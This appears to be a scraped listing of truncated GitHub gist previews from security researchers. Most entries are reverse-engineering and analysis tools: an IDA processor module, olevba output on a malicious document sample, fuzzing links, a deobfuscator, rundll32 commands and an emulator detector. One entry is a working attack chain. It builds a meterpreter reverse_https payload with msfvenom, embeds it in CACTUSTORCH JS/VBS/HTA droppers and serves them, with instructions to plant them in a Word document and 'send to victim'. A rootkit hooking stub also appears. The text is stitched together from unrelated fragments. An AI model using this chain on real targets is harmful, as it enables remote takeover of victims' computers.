ulexec

# Subleq Processor module for Flareon5 challenge 12. Tested in IDA 7
# by @ulexec

import sys
import idc
import idaapi
import idautils
from idc import *
from idaapi import *

JohnLaTwC

## Uploaded by @JohnLaTwC
## Sample Hash: 80610bb3a5be887e9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:M-S-HB-- 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
===============================================================================
FILE: 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
Type: OpenXML
-------------------------------------------------------------------------------

mylamour

Artical

• https://medium.com/@coolx28/security-oriented-open-source-continuous-fuzzing-101-from-start-to-finish-637eaceb9acb
• https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/
• https://research.aurainfosec.io/hunting-for-bugs-101/
• https://labsblog.f-secure.com/2017/06/22/super-awesome-fuzzing-part-one/
• https://thecyberrecce.net/2017/03/20/software-exploit-development-fuzzing-with-afl/
• https://www.sec-consult.com/wp-content/uploads/files/vulnlab/the_art_of_fuzzing_slides.pdf
• https://hackernoon.com/afl-unicorn-fuzzing-arbitrary-binary-code-563ca28936bf

struppigel

import sys
import re

if len(sys.argv) <= 1: exit()
scriptpath = sys.argv[1]

with open(scriptpath, 'r') as scriptfile:
	script = scriptfile.read().replace('^', '')
	p = re.compile('\([Ss][Ee][Tt][^=]+=([^&]+)&&')
	s = p.search(script)

scotgabriel

Rundll32 commands

OS: Windows 10/8/7

Add/Remove Programs

• RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0

Content Advisor

• RunDll32.exe msrating.dll,RatingSetupUI

Control Panel

herrcore

Moved: https://github.com/OALabs/hexcopy-ida

patois

from idaapi import *

# with code taken from
# - http://hexblog.com/idapro/vmware_modules.py
# - HexRays forum
# - https://gist.github.com/nmulasmajic/f90661489f858237bcd68fbde5516abd#file-find_nt_imagebase_x64-py

class LoadedModulesList(Choose2):

    def __init__(self, title, modlistEA=BADADDR, flags=0, width=None, height=None, embedded=False, modal=False):

Injectable.cpp

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

xillwillx

git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\

farbod-s

package net.skoumal.emulatordetector;

import android.os.Build;
import android.util.Log;
import java.io.File;
import android.bluetooth.BluetoothAdapter;
import android.os.Environment;

/**
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with